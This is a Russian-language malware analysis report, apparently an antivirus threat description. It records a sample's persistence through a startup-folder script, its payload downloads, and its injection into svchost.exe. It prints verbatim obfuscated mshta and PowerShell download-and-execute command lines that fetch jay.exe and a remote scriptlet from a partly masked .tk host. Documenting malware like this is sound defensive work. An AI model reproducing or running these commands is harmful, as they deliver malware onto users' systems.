Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\chrome.js
Вредоносные функции
Загружает и запускает на исполнение
- http://pr#####oeletrozema.tk/ja/jay.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' VBScRiPT:cLOSe (GEtobjECt ("scRiPt:http://pr#####oeletrozema.tk/ja/jt") )
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\svchost.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\bypaxx.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://pr#####oeletrozema.tk/ja/jt
- http://pr#####oeletrozema.tk/ja/jay.exe
UDP
- DNS ASK pr#####oeletrozema.tk
Другое
Создает и запускает на исполнение
- '%APPDATA%\bypaxx.exe'
- '<SYSTEM32>\cmd.exe' "/c PoWERShell.eXE -Ex BYpASS -nOp -W 1 seT-ConTENt -va ( nEW-ObJecT nEt.WeBCLiENT ).DOwNLOaddaTa( 'http://pr#####oeletrozema.tk/ja/jay.exe' ) -eN bYTE -PAtH '...' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' VBScRiPT:cLOSe (GEtobjECt ("scRiPt:http://pr#####oeletrozema.tk/ja/jt") )' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/c PoWERShell.eXE -Ex BYpASS -nOp -W 1 seT-ConTENt -va ( nEW-ObJecT nEt.WeBCLiENT ).DOwNLOaddaTa( 'http://pr#####oeletrozema.tk/ja/jay.exe' ) -eN bYTE -PAtH '...
- '%WINDIR%\syswow64\svchost.exe'
